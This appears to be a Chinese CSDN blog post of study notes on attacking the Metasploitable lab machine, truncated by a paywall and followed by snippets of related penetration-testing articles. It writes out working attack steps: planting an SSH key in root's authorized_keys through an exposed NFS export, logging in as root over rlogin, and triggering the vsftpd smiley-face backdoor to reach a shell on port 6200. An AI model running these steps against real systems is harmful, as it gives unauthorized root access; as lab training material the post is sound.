Metasploitable 漏洞学习 一 存在问题

最新推荐文章于 2023-08-09 17:48:22 发布
最新推荐文章于 2023-08-09 17:48:22 发布
阅读量391 收藏
点赞数
分类专栏: 学习笔记 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49081269/article/details/115345174
版权

Metasploitable 漏洞学习 一

TCP端口

512,523,514端口是都知道的“R”服务 可以通过
rlogin -l root IP进行测试
使用root身份进行远程登录 如果提示输入ssh秘钥 则证明没有安装rsh-client工具
解决办法:
rpcinfo -p IP
可以测试服务器存在网络文件系统(NFS),然后根据测试判断存在可共享/导出的文件,然后再攻击系统上生成新的SSH秘钥 安装NFS导出 然后添加到文件夹中
具体操作:

mkdir /tmp/r00t
mount -t nfs IP:/ /tmp/r00t
cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys
umount /tmp/r00t
ssh root@IP
  #mount 挂载的意思

Vsftpd源代码包含漏洞

端口21 是ftp服务器 在vsftpd上有一个特定的后门 如果在输入用户名后以:)笑脸为结尾,后门会在6200端口开始监听shelll
方法一:
具体操作:

telnet IP
user backdoored:)
^]
quit
 telnet IP 6200
※ 在实验之前需要需要安装东西
apt-get install telnetd
apt-get install xinetd
vim /etc/inetd.conf


             	...
	#daytime		stream	tcp6	nowait	root	internal
	#time		stream	tcp6	nowait	root	internal

	#
最低0.47元/天 解锁文章
pikaq-M
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
vnc弱口令爆破
西部壮仔的博客
05-24 4535
VNC介绍 VNC(Virtual Network Console)是虚拟网络控制台的缩写。它是一款优秀的远程控制工具软件,由著名的AT&T的欧洲研究实验室开发的。可视化控制,类似于远程桌面,默认vnc服务运行在5900端口 爆破步骤 1.信息收集 nmap 扫描 2.使用msf msf5 > use auxiliary/scanner/vnc/vnc_login msf5 auxiliary(scanner/vnc/vnc_login) > set RHOSTS 192.168.0.1
6-24漏洞利用-vnc密码破解
山兔的博客
08-01 3920
VNC(VirtualNetworkConsole)是虚拟网络控制台的缩写。它是一款优秀的远程控制工具软件,由著名的AT&T的欧洲研究实验室开发的。主要是用来可视化控制,类似于远程桌面,我们之前接触的ssh、rlogin都是命令行的控制终端,但是VNC跟远程桌面,又有一点不同,远程桌面,开放的是3389,而VNC服务端默认运行在5900端口5900端口,开放的一般是VNC服务端。...
4.6、漏洞利用-Telnet
c10udz的博客
10-03 2976
Telnet服务,即远程终端协议服务,使用明文传输用户的所有内容,具有安全隐患。Telnet服务默认使用23端口(1)使用nmap获取(2)使用metasploit
外网测试telnet&SSH漏洞案例分析
最新发布
szembed的博客
08-09 260
有代码优化时一并修改,以关闭外网漏洞
6-7漏洞利用-Telnet暴力破解
山兔的博客
07-12 2953
Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。我们本地有台计算机,远程有台服务器,服务器上开启telnet服务,我们可以通过本地的机器连接到telnet服务器,然后执行对应的系统命令,服务器执行完成之后,会将结果返回到本地计算机,中间通过的协议就是telnet协议在终端使用者的电脑上使用telent程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务
Metasploitable2-Linux.7z
02-26
这个Linux版本的Metasploitable2包含了多个服务和应用,这些服务和应用都存在已知的安全弱点,便于学习者理解和实践如何发现并利用这些漏洞。 【标签】"安全漏洞" 标签明确了这个资源的核心价值,即它是一个用于...
metasploitable3.7z
02-13
mkdir metasploitable3-workspace cd metasploitable3-workspace curl -O https://raw.githubusercontent.com/rapid7/metasploitable3/master/Vagrantfile && vagrant up ``` Windows users: ``` mkdir ...
metasploitable-linux-2.0.0.zip
09-01
它的核心目标是为安全专家、渗透测试人员和教育工作者提供一个充满漏洞的环境,以便在可控条件下实践和学习黑客攻击技术以及防御策略。"metasploitable-linux-2.0.0.zip"这个压缩包文件即包含了这个虚拟环境的镜像,...
Metasploitable2靶机漏洞_hanxu.doc
09-28
Metasploitable2靶机漏洞_hanxu.doc
暗组全自动VNC扫描工具.rar
04-11
扫描可用IP,简洁好用扫描可用IP,简洁好用扫描可用IP,简洁好用扫描可用IP,简洁好用扫描可用IP,简洁好用扫描可用IP,简洁好用
最全弱口令常用口令大集合.rar
11-28
弱口令大集合,从top100,1000到top100000的密码,以及常见的从3位起到10位的弱口令,还有姓名拼音等多个弱口令字典,各种撞库等,数字亲测好用,大家快来下载吧,挺不错的一个资源哦!!
VNC5.1.1远程工具
06-20
可以便于在windows下远程桌面linux系统。 亲测无毒,连接centos无压力。
安全测试(三) 服务器安全 渗透测试 常规服务器安全漏洞 高危端口暴露、弱口令密码、暴力破解、服务器提权、Mysql数据库提权等 浅谈《社会工程学》实战案例
Benjamin CSDN博客
12-27 4732
安全测试(三) 服务器安全 渗透测试 常规服务器安全漏洞 高危端口暴露、弱口令密码、暴力破解、服务器提权、Mysql数据库提权等 浅谈《社会工程学》实战案例安全测试(三) 服务器安全 渗透测试 常规服务器安全漏洞 高危端口暴露、弱口令密码、暴力破解、服务器提权、Mysql数据库提权等 浅谈《社会工程学》实战案例 ​二、服务器安全 高危端口 2.1 端口号(Port number) 2.2 常见端口后及其用途表 2.3 端口号 扫描工具介绍 2.4 端口号 端口说明 攻击技巧 2.5 安全警示 三、服务器安全
看完这篇 教你玩转渗透测试靶机——Metasploitable2
热门推荐
Aluxian_的博客
03-09 2万+
Metasploitable2渗透测试详解Metasploitable2靶机介绍:Metasploitable2靶机下载:Metasploitable2靶机安装:Metasploitable2靶机漏洞详解: Metasploitable2靶机介绍: Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 Metasploita
metasploitable2,3漏洞加固
虚心学习,脚踏实地
05-03 1636
metasploitable2,3攻击及加固
metasploitable2--简介--漏洞利用
weixin_45018333的博客
03-16 7248
1.metasploitable是用于评估metasploit的靶机。 2.metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 3.闲聊一句:原来觉得搭建环境是很没有必要的,应该拿实际的网络去练习,但是结果就是很久没找到目标而且还不是一个很好的行为。就很懒得去搭建,太麻烦,但是现在忽然明白...
web渗透测试----5、暴力破解漏洞--(3)FTP密码破解
七天
06-23 1667
FTP暴力破解
metasploitable漏洞利用
07-25
Metasploitable是一个用于评估Metasploit的靶机,它是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。它本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。\[2\] 在Metasploit中,要利用Metasploitable漏洞,你可以使用"use"命令来选择相应的模块。例如,如果你想利用ms08_067漏洞,你可以使用"use"命令来选择该模块。语法是"use 模块的名字"。然后,你可以根据具体的实战背景和需求,使用其他命令和参数来执行相应的操作。\[3\] 总结起来,Metasploitable是一个用于评估Metasploit的靶机,可以用于测试常见漏洞。在Metasploit中,你可以使用"use"命令来选择相应的模块,然后根据实际需求进行漏洞利用。 #### 引用[.reference_title] - *1* *3* [Metasploit 渗透测试框架的基本使用(扩展:利用永恒之蓝漏洞攻击WIN7靶机)](https://blog.csdn.net/weixin_46035615/article/details/124168761)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [metasploitable2--简介--漏洞利用](https://blog.csdn.net/weixin_45018333/article/details/104841419)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值